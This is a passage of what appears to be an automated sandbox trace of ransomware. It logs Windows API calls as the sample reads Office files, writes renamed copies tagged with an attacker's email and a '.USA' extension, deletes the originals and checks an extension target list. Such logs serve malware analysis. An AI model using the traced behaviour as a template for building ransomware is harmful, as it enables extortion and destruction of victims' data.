(in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.921] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.922] GetLastError () returned 0x0 [0272.922] ReadFile (in: hFile=0x39c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0xcd, lpOverlapped=0x0) returned 1 [0272.922] WriteFile (in: hFile=0x328, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xd0, lpOverlapped=0x0) returned 1 [0272.923] ReadFile (in: hFile=0x39c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.923] WriteFile (in: hFile=0x328, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xee, lpOverlapped=0x0) returned 1 [0272.923] SetEndOfFile (hFile=0x328) returned 1 [0272.923] CloseHandle (hObject=0x328) returned 1 [0272.923] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.923] SetEndOfFile (hFile=0x39c) returned 1 [0273.075] CloseHandle (hObject=0x39c) returned 1 [0273.075] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.092] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt")) returned 1 [0273.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.127] lstrlenW (lpString=".doc") returned 4 [0273.127] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0273.127] lstrlenW (lpString=".docx") returned 5 [0273.127] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0273.127] lstrlenW (lpString=".pdf") returned 4 [0273.127] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0273.127] lstrlenW (lpString=".xls") returned 4 [0273.127] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0273.127] lstrlenW (lpString=".xlsx") returned 5 [0273.127] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0273.127] lstrlenW (lpString=".ppt") returned 4 [0273.127] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0273.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.127] lstrlenW (lpString=".zip") returned 4 [0273.127] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0273.127] lstrlenW (lpString=".rar") returned 4 [0273.127] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0273.128] lstrlenW (lpString=".bz2") returned 4 [0273.128] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0273.128] lstrlenW (lpString=".7z") returned 3 [0273.128] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0273.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.128] lstrlenW (lpString=".dbf") returned 4 [0273.128] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0273.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.128] lstrlenW (lpString=".1cd") returned 4 [0273.128] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0273.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.128] lstrlenW (lpString=".jpg") returned 4 [0273.128] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0273.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.128] lstrlenW (lpString=".doc") returned 4 [0273.128] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0273.128] lstrlenW (lpString=".docx") returned 5 [0273.128] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0273.128] lstrlenW (lpString=".pdf") returned 4 [0273.128] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0273.128] lstrlenW (lpString=".xls") returned 4 [0273.128] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0273.128] lstrlenW (lpString=".xlsx") returned 5 [0273.128] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0273.128] lstrlenW (lpString=".ppt") returned 4 [0273.128] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0273.128] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.128] lstrlenW (lpString=".zip") returned 4 [0273.128] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0273.128] lstrlenW (lpString=".rar") returned 4 [0273.129] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0273.129] lstrlenW (lpString=".bz2") returned 4 [0273.129] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0273.129] lstrlenW (lpString=".7z") returned 3 [0273.129] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0273.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.129] lstrlenW (lpString=".dbf") returned 4 [0273.129] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0273.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.129] lstrlenW (lpString=".1cd") returned 4 [0273.129] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0273.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT") returned 61 [0273.129] lstrlenW (lpString=".jpg") returned 4 [0273.129] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0273.129] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0273.129] lstrlenW (lpString="FACILITY.VSL") returned 12 [0273.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.742] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=81768) returned 1 [0273.742] CloseHandle (hObject=0x394) returned 1 [0273.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl")) returned 0x20 [0273.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.744] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.744] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.745] GetLastError () returned 0x0 [0273.745] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x13f68, lpOverlapped=0x0) returned 1 [0273.747] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x13f70, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x13f70, lpOverlapped=0x0) returned 1 [0273.749] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.749] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.749] SetEndOfFile (hFile=0x3a8) returned 1 [0273.749] CloseHandle (hObject=0x3a8) returned 1 [0273.749] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.749] SetEndOfFile (hFile=0x394) returned 1 [0273.752] CloseHandle (hObject=0x394) returned 1 [0273.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\facility.vsl")) returned 1 [0273.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.752] lstrlenW (lpString=".doc") returned 4 [0273.752] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0273.753] lstrlenW (lpString=".docx") returned 5 [0273.753] lstrcmpiW (lpString1=".docx", lpString2="Y.VSL") returned -1 [0273.753] lstrlenW (lpString=".pdf") returned 4 [0273.753] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0273.753] lstrlenW (lpString=".xls") returned 4 [0273.753] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0273.753] lstrlenW (lpString=".xlsx") returned 5 [0273.753] lstrcmpiW (lpString1=".xlsx", lpString2="Y.VSL") returned -1 [0273.753] lstrlenW (lpString=".ppt") returned 4 [0273.753] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0273.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.753] lstrlenW (lpString=".zip") returned 4 [0273.753] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0273.753] lstrlenW (lpString=".rar") returned 4 [0273.753] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0273.753] lstrlenW (lpString=".bz2") returned 4 [0273.753] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0273.753] lstrlenW (lpString=".7z") returned 3 [0273.753] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0273.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.753] lstrlenW (lpString=".dbf") returned 4 [0273.753] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0273.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.753] lstrlenW (lpString=".1cd") returned 4 [0273.753] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0273.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.753] lstrlenW (lpString=".jpg") returned 4 [0273.753] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0273.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.754] lstrlenW (lpString=".doc") returned 4 [0273.754] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0273.754] lstrlenW (lpString=".docx") returned 5 [0273.754] lstrcmpiW (lpString1=".docx", lpString2="Y.VSL") returned -1 [0273.754] lstrlenW (lpString=".pdf") returned 4 [0273.754] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0273.754] lstrlenW (lpString=".xls") returned 4 [0273.754] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0273.754] lstrlenW (lpString=".xlsx") returned 5 [0273.754] lstrcmpiW (lpString1=".xlsx", lpString2="Y.VSL") returned -1 [0273.754] lstrlenW (lpString=".ppt") returned 4 [0273.754] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0273.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.754] lstrlenW (lpString=".zip") returned 4 [0273.754] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0273.754] lstrlenW (lpString=".rar") returned 4 [0273.754] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0273.754] lstrlenW (lpString=".bz2") returned 4 [0273.754] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0273.754] lstrlenW (lpString=".7z") returned 3 [0273.754] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0273.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.754] lstrlenW (lpString=".dbf") returned 4 [0273.754] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0273.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.754] lstrlenW (lpString=".1cd") returned 4 [0273.754] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0273.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FACILITY.VSL") returned 60 [0273.754] lstrlenW (lpString=".jpg") returned 4 [0273.754] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0273.755] lstrcmpiW (lpString1=".HXC", lpString2=".USA") returned -1 [0273.755] lstrlenW (lpString="GRAPH_COL.HXC") returned 13 [0273.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.756] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=621) returned 1 [0273.756] CloseHandle (hObject=0x394) returned 1 [0273.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc")) returned 0x20 [0273.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.756] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.756] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.756] GetLastError () returned 0x0 [0273.756] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x26d, lpOverlapped=0x0) returned 1 [0273.757] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x270, lpOverlapped=0x0) returned 1 [0273.758] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.758] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xee, lpOverlapped=0x0) returned 1 [0273.758] SetEndOfFile (hFile=0x3a8) returned 1 [0273.758] CloseHandle (hObject=0x3a8) returned 1 [0273.758] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.758] SetEndOfFile (hFile=0x394) returned 1 [0273.762] CloseHandle (hObject=0x394) returned 1 [0273.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.762] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc")) returned 1 [0273.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.762] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.762] lstrlenW (lpString=".doc") returned 4 [0273.762] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0273.763] lstrlenW (lpString=".docx") returned 5 [0273.763] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0273.763] lstrlenW (lpString=".pdf") returned 4 [0273.763] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0273.763] lstrlenW (lpString=".xls") returned 4 [0273.763] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0273.763] lstrlenW (lpString=".xlsx") returned 5 [0273.763] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0273.763] lstrlenW (lpString=".ppt") returned 4 [0273.763] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0273.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.763] lstrlenW (lpString=".zip") returned 4 [0273.763] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0273.763] lstrlenW (lpString=".rar") returned 4 [0273.763] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0273.763] lstrlenW (lpString=".bz2") returned 4 [0273.763] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0273.763] lstrlenW (lpString=".7z") returned 3 [0273.763] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0273.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.763] lstrlenW (lpString=".dbf") returned 4 [0273.763] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0273.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.763] lstrlenW (lpString=".1cd") returned 4 [0273.763] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0273.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.763] lstrlenW (lpString=".jpg") returned 4 [0273.763] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0273.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.763] lstrlenW (lpString=".doc") returned 4 [0273.764] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0273.764] lstrlenW (lpString=".docx") returned 5 [0273.764] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0273.764] lstrlenW (lpString=".pdf") returned 4 [0273.764] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0273.764] lstrlenW (lpString=".xls") returned 4 [0273.764] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0273.764] lstrlenW (lpString=".xlsx") returned 5 [0273.764] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0273.764] lstrlenW (lpString=".ppt") returned 4 [0273.764] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.764] lstrlenW (lpString=".zip") returned 4 [0273.764] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0273.764] lstrlenW (lpString=".rar") returned 4 [0273.764] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0273.764] lstrlenW (lpString=".bz2") returned 4 [0273.764] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0273.764] lstrlenW (lpString=".7z") returned 3 [0273.764] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.764] lstrlenW (lpString=".dbf") returned 4 [0273.764] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.764] lstrlenW (lpString=".1cd") returned 4 [0273.764] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0273.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61 [0273.764] lstrlenW (lpString=".jpg") returned 4 [0273.764] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0273.765] lstrcmpiW (lpString1=".HXT", lpString2=".USA") returned -1 [0273.765] lstrlenW (lpString="GRAPH_COL.HXT") returned 13 [0273.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.765] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=205) returned 1 [0273.765] CloseHandle (hObject=0x394) returned 1 [0273.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt")) returned 0x20 [0273.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.765] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.765] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.766] GetLastError () returned 0x0 [0273.766] ReadFile (in: hFile=0x394, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0xcd, lpOverlapped=0x0) returned 1 [0273.766] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: 